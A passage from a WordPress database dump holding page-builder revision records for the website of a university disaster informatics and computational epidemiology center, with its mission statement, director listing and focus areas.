<\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c38\",\"index\":2,\"id\":\"453-c41\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c38\",\"index\":3,\"id\":\"453-c42\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c38\",\"index\":4,\"id\":\"453-c43\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c37\",\"parentId\":\"453-c36\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c36\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:21:12','2022-04-29 05:21:12','',1224,'https://gsudice.dataconn.net/?p=1231',0,'revision','',0),(1239,1,'2022-04-29 01:36:48','2022-04-29 05:36:48','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\"}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:36:48','2022-04-29 05:36:48','',1224,'https://gsudice.dataconn.net/?p=1239',0,'revision','',0),(1246,1,'2022-04-29 01:43:49','2022-04-29 05:43:49','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:43:49','2022-04-29 05:43:49','',1224,'https://gsudice.dataconn.net/?p=1246',0,'revision','',0),(1254,1,'2022-04-29 08:39:12','2022-04-29 12:39:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:39:12','2022-04-29 12:39:12','',1224,'https://gsudice.dataconn.net/?p=1254',0,'revision','',0),(1266,1,'2022-04-29 08:48:10','2022-04-29 12:48:10','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:48:10','2022-04-29 12:48:10','',1224,'https://gsudice.dataconn.net/?p=1266',0,'revision','',0),(1273,1,'2022-04-29 08:48:47','2022-04-29 12:48:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>-----Director\'s Statement -----<\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:48:47','2022-04-29 12:48:47','',1224,'https://gsudice.dataconn.net/?p=1273',0,'revision','',0),(1280,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',168,'https://gsudice.dataconn.net/?p=1280',0,'revision','',0),(1281,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 